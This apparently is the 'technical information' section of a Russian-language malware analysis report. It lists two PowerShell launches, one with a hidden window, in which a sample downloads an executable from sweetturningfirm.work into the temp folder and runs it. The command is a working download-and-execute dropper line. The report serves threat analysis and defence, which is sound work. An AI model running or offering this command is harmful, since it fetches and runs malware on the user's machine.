Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = $env:temp + '\zhXJvJTJg.exe';WGet 'http://sweetturningfirm.work/YOUthr.exe' -outFiLe $a;start $a
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = $env:temp + '\zhXJvJTJg.exe';WGet 'http://sweetturningfirm.work/YOUthr.exe' -outFiLe $a;start $a' (со скрытым окном)